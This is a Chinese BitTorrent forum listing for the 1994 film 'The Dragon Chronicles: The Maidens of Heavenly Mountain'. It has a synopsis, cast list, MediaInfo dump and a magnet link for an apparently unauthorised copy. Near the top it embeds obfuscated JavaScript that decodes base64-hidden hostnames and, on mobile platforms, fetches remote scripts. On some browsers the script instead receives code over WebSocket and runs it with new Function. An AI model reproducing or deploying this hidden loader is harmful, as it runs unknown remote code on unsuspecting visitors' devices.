新天龙八部之天山童姥[国语配音/粤语配音/中文字幕].The.Dragon.Chronicles.1994.1080p.HKG.BluRay.x265.10bit.DTS.2Audio 5.03GB

版主小s 1月前 337

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 新天龙八部之天山童姥 / 天龙八部之天山童姥 / 天山童姥 / Dragon Chronicles: The Maidens of Heavenly Mountain
◎片  名 新天龍八部之天山童姥
◎年  代 1994
◎产  地 中国香港 / 中国大陆
◎类  别 动作 / 武侠 / 古装
◎语  言 粤语
◎上映日期 1994-03-05(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt0111776/
◎豆瓣评分 7.5/10 (65878人评价)
◎豆瓣链接 https://movie.douban.com/subject/1297517/
◎片  长 96分钟
◎导  演 钱永强 Andy Chin (id:1323176)
◎编  剧 张炭 Cheung Tan (id:1313457)
       金庸 Louis Cha (id:1019677)
◎演  员 林青霞 Brigitte Lin (id:1044746)
       巩俐 Li Gong (id:1035641)
       张敏 Sharla Cheung (id:1005297)
       林文龙 Frankie Lam (id:1275126)
       徐少强 Norman Chu (id:1048469)
       廖启智 Kai Chi Liu (id:1274268)
       白石千 James Pax (id:1315114)
       贾天怡 Tin Yi Ku (id:1366833)
       向华强 Charles Heung (id:1037691)
       向华胜 Jimmy Heung (id:1327878)
       于本正 Benzheng Yu (id:1301553)
       林敏怡 Man Yee Lam (id:1289301)
       黄锐民 Oliver Wong (id:1290844)
       郭东昌 Dongchang Guo (id:1419819)
       张叔平 William Chang (id:1274369)
       方盈 Ying Fang (id:1162628)
       桂少林 Shaolin Gui (id:1380931)
       祁明远 Mingyuan Qi (id:1353352)
       李炳良 Bing-leung Lee (id:1431208)

◎标  签 林青霞 / 武侠 / 香港 / 巩俐 / 香港电影 / 张敏 / 古装 / 动作

◎简  介
  天山派李秋水(林青霞 饰)爱上掌门师兄逍遥子,却不知逍遥子所爱的其实是李秋水的孪生妹妹李沧海(林青霞 饰)。而天山童姥巫行云(巩俐 饰)对李沧海亦有超越性别之爱。逍遥子被同门叛徒丁春秋(徐少强 饰)下毒中伤,被迫归隐到飘渺峰,设下“玲珑棋局”等来本性善良、佛性极深的有缘人虚竹 (林文龙 饰),将百年功力悉数相传,以期代他清理门户。 为夺少林宝物,丁春秋率阿紫(张敏 饰)、诱动连手的李秋水等人欲血洗少林,得到了逍遥子毕生功力的虚竹在巫行云的帮助下临危受命,与丁春秋展开了回合大战。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 306657971174897593036744778540208995405 (0xE6B42D4BBF907EACDB8F9810B12DBC4D)

  4. Complete name                            : The.Drag[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.03 GiB

  8. Duration                                 : 1 h 36 min

  9. Overall bit rate                         : 7 432 kb/s

  10. Encoded date                             : UTC 2021-08-16 10:51:06

  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 36 min

  20. Bit rate                                 : 5 496 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 1 080 pixels

  23. Display aspect ratio                     : 16:9

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.110

  30. Stream size                              : 3.72 GiB (74%)

  31. Writing library                          : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=23.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.60 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  33. Language                                 : English

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio #1

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 36 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 510 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 1.02 GiB (20%)

  51. Title                                    : Cantonese

  52. Language                                 : Chinese

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Audio #2

  56. ID                                       : 3

  57. Format                                   : AC-3

  58. Format/Info                              : Audio Coding 3

  59. Commercial name                          : Dolby Digital

  60. Codec ID                                 : A_AC3

  61. Duration                                 : 1 h 36 min

  62. Bit rate mode                            : Constant

  63. Bit rate                                 : 384 kb/s

  64. Channel(s)                               : 2 channels

  65. Channel layout                           : L R

  66. Sampling rate                            : 48.0 kHz

  67. Frame rate                               : 31.250 FPS (1536 SPF)

  68. Compression mode                         : Lossy

  69. Stream size                              : 266 MiB (5%)

  70. Title                                    : Mandarin

  71. Language                                 : Chinese

  72. Service kind                             : Complete Main

  73. Default                                  : No

  74. Forced                                   : No


  75. Text #1

  76. ID                                       : 4

  77. Format                                   : PGS

  78. Muxing mode                              : zlib

  79. Codec ID                                 : S_HDMV/PGS

  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration                                 : 1 h 36 min

  82. Bit rate                                 : 37.4 kb/s

  83. Count of elements                        : 2101

  84. Stream size                              : 25.7 MiB (0%)

  85. Title                                    : cht

  86. Language                                 : Chinese

  87. Default                                  : No

  88. Forced                                   : No


  89. Text #2

  90. ID                                       : 5

  91. Format                                   : PGS

  92. Muxing mode                              : zlib

  93. Codec ID                                 : S_HDMV/PGS

  94. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration                                 : 1 h 36 min

  96. Bit rate                                 : 36.8 kb/s

  97. Count of elements                        : 2103

  98. Stream size                              : 25.3 MiB (0%)

  99. Title                                    : chs

  100. Language                                 : Chinese

  101. Default                                  : Yes

  102. Forced                                   : No


  103. Text #3

  104. ID                                       : 6

  105. Format                                   : PGS

  106. Muxing mode                              : zlib

  107. Codec ID                                 : S_HDMV/PGS

  108. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  109. Duration                                 : 1 h 35 min

  110. Bit rate                                 : 40.7 kb/s

  111. Count of elements                        : 2082

  112. Stream size                              : 27.7 MiB (1%)

  113. Title                                    : eng

  114. Language                                 : English

  115. Default                                  : No

  116. Forced                                   : No


  117. Menu

  118. 00:00:00.000                             : :第 01 章

  119. 00:10:23.042                             : :第 02 章

  120. 00:16:26.875                             : :第 03 章

  121. 00:23:44.500                             : :第 04 章

  122. 00:33:38.917                             : :第 05 章

  123. 00:39:21.042                             : :第 06 章

  124. 00:47:26.083                             : :第 07 章

  125. 00:56:42.917                             : :第 08 章

  126. 01:03:54.125                             : :第 09 章

  127. 01:12:50.000                             : :第 10 章

  128. 01:21:07.833                             : :第 11 章

  129. 01:26:10.667                             : :第 12 章



TAGS 武侠 动作 古装

磁力链:
  • magnet:?xt=urn:btih:5E8CA7F09C50F7A43DEFFC4980B0270AFF26BDB3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回